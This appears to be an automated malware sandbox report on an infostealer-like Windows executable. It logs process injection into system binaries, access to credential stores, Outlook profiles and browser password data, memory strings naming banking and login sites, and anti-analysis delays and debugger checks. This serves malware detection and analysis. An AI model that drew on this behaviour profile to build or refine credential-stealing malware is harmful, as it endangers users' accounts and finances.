Source: findstr.exe, 00000007.00000002.3924355546.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3924355546.00000000032C5000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2520892415.000000000329A000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3924355546.000000000329A000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2520776219.0000000003279000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: GJRX21GBj3.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\GJRX21GBj3.exe File read: C:\Users\user\Desktop\GJRX21GBj3.exe
Source: unknown Process created: C:\Users\user\Desktop\GJRX21GBj3.exe "C:\Users\user\Desktop\GJRX21GBj3.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: GJRX21GBj3.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: GJRX21GBj3.exe Static file information: File size 1951744 > 1048576
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: GJRX21GBj3.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: findstr.pdbGCTL source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ngen.pdb source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360774678.00000000032FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.00000000286EC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215505772.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360491290.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: findstr.pdb source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: GJRX21GBj3.exe Static PE information: section name: .managed
Source: GJRX21GBj3.exe Static PE information: section name: hydrated
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004017BF push ds; iretd 4_2_00401B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0040A8C2 push ss; iretd 4_2_0040A921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041A881 push esp; iretd 4_2_0041A882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041E8B7 push ss; ret 4_2_0041E8BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004051A1 push ebp; ret 4_2_004051A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004019BF push ds; iretd 4_2_00401B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00401B31 push ds; iretd 4_2_00401B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00403500 push eax; ret 4_2_00403502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041CD8C push edx; iretd 4_2_0041CD8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00407643 pushfd ; iretd 4_2_0040765A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00407638 pushfd ; iretd 4_2_0040765A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041A763 push esi; iretd 4_2_0041A767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058809AD push ecx; mov dword ptr [esp], ecx 4_2_058809B6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036809AD push ecx; mov dword ptr [esp], ecx 7_2_036809B6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E57260 push esi; iretd 7_2_02E57264
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E57247 push esi; iretd 7_2_02E57264
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5B3B4 push ss; ret 7_2_02E5B3BA
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E473BF push ss; iretd 7_2_02E4741E
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5737E push esp; iretd 7_2_02E5737F
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E620DD push cs; ret 7_2_02E620DE
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E44140 pushfd ; iretd 7_2_02E44157
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E44135 pushfd ; iretd 7_2_02E44157
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5711C push esi; iretd 7_2_02E57264
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E60BB3 push cs; ret 7_2_02E60BB4
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E59889 push edx; iretd 7_2_02E5988A
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5FE8D push es; iretd 7_2_02E5FE8E
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E41C9E push ebp; ret 7_2_02E41C9F
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03494072 push eax; iretd 7_2_03494078
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03499808 push ebx; ret 7_2_0349989F
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_034A2822 push eax; ret 7_2_034A2824
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03490E84 push ecx; retf 7_2_03490E85
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory allocated: 29B95880000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD1C0 rdtsc 4_2_058FD1C0
Source: C:\Windows\SysWOW64\findstr.exe Window / User API: threadDelayed 2128
Source: C:\Windows\SysWOW64\findstr.exe Window / User API: threadDelayed 7845
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\findstr.exe API coverage: 2.7 %
Source: C:\Windows\SysWOW64\findstr.exe TID: 6208 Thread sleep count: 2128 > 30
Source: C:\Windows\SysWOW64\findstr.exe TID: 6208 Thread sleep time: -4256000s >= -30000s
Source: C:\Windows\SysWOW64\findstr.exe TID: 6208 Thread sleep count: 7845 > 30
Source: C:\Windows\SysWOW64\findstr.exe TID: 6208 Thread sleep time: -15690000s >= -30000s
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe TID: 1856 Thread sleep time: -65000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\findstr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\findstr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5BF10 FindFirstFileW,FindNextFileW,FindClose, 7_2_02E5BF10
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658562760 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask, 0_2_00007FF658562760
Source: H0840I45.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3924911559.000000000141A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
Source: H0840I45.7.dr Binary or memory string: discord.comVMware20,11696428655f
Source: H0840I45.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: GJRX21GBj3.exe Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: H0840I45.7.dr Binary or memory string: global block list test formVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: H0840I45.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: H0840I45.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: H0840I45.7.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: H0840I45.7.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: H0840I45.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: H0840I45.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: H0840I45.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: H0840I45.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: H0840I45.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: H0840I45.7.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: H0840I45.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: firefox.exe, 0000000B.00000002.2629405691.0000016FA869D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK?+P
Source: H0840I45.7.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: H0840I45.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: H0840I45.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\findstr.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD1C0 rdtsc 4_2_058FD1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00417A33 LdrLoadDll, 4_2_00417A33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B4588 mov eax, dword ptr fs:[00000030h] 4_2_058B4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590B594 mov eax, dword ptr fs:[00000030h] 4_2_0590B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590B594 mov eax, dword ptr fs:[00000030h] 4_2_0590B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587758F mov eax, dword ptr fs:[00000030h] 4_2_0587758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05882582 mov eax, dword ptr fs:[00000030h] 4_2_05882582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05882582 mov ecx, dword ptr fs:[00000030h] 4_2_05882582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE59C mov eax, dword ptr fs:[00000030h] 4_2_058BE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h] 4_2_058A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059135BA mov eax, dword ptr fs:[00000030h] 4_2_059135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F5BE mov eax, dword ptr fs:[00000030h] 4_2_0593F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059005A7 mov eax, dword ptr fs:[00000030h] 4_2_059005A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h] 4_2_058AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A45B1 mov eax, dword ptr fs:[00000030h] 4_2_058A45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059535D7 mov eax, dword ptr fs:[00000030h] 4_2_059535D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE5CF mov eax, dword ptr fs:[00000030h] 4_2_058BE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B55C0 mov eax, dword ptr fs:[00000030h] 4_2_058B55C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A95DA mov eax, dword ptr fs:[00000030h] 4_2_058A95DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058865D0 mov eax, dword ptr fs:[00000030h] 4_2_058865D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA5D0 mov eax, dword ptr fs:[00000030h] 4_2_058BA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059555C9 mov eax, dword ptr fs:[00000030h] 4_2_059555C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD5D0 mov eax, dword ptr fs:[00000030h] 4_2_058FD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD5D0 mov ecx, dword ptr fs:[00000030h] 4_2_058FD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BC5ED mov eax, dword ptr fs:[00000030h] 4_2_058BC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058825E0 mov eax, dword ptr fs:[00000030h] 4_2_058825E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_058AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h] 4_2_058A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B7505 mov eax, dword ptr fs:[00000030h] 4_2_058B7505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B7505 mov ecx, dword ptr fs:[00000030h] 4_2_058B7505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05954500 mov eax, dword ptr fs:[00000030h] 4_2_05954500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05955537 mov eax, dword ptr fs:[00000030h] 4_2_05955537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h] 4_2_058AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h] 4_2_0592F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BD530 mov eax, dword ptr fs:[00000030h] 4_2_058BD530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890535 mov eax, dword ptr fs:[00000030h] 4_2_05890535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593B52F mov eax, dword ptr fs:[00000030h] 4_2_0593B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h] 4_2_0588D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05888550 mov eax, dword ptr fs:[00000030h] 4_2_05888550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B656A mov eax, dword ptr fs:[00000030h] 4_2_058B656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B562 mov eax, dword ptr fs:[00000030h] 4_2_0587B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BB570 mov eax, dword ptr fs:[00000030h] 4_2_058BB570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B480 mov eax, dword ptr fs:[00000030h] 4_2_0587B480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05889486 mov eax, dword ptr fs:[00000030h] 4_2_05889486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590A4B0 mov eax, dword ptr fs:[00000030h] 4_2_0590A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058864AB mov eax, dword ptr fs:[00000030h] 4_2_058864AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B34B0 mov eax, dword ptr fs:[00000030h] 4_2_058B34B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B44B0 mov ecx, dword ptr fs:[00000030h] 4_2_058B44B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059554DB mov eax, dword ptr fs:[00000030h] 4_2_059554DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058804E5 mov ecx, dword ptr fs:[00000030h] 4_2_058804E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059294E0 mov eax, dword ptr fs:[00000030h] 4_2_059294E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A340D mov eax, dword ptr fs:[00000030h] 4_2_058A340D
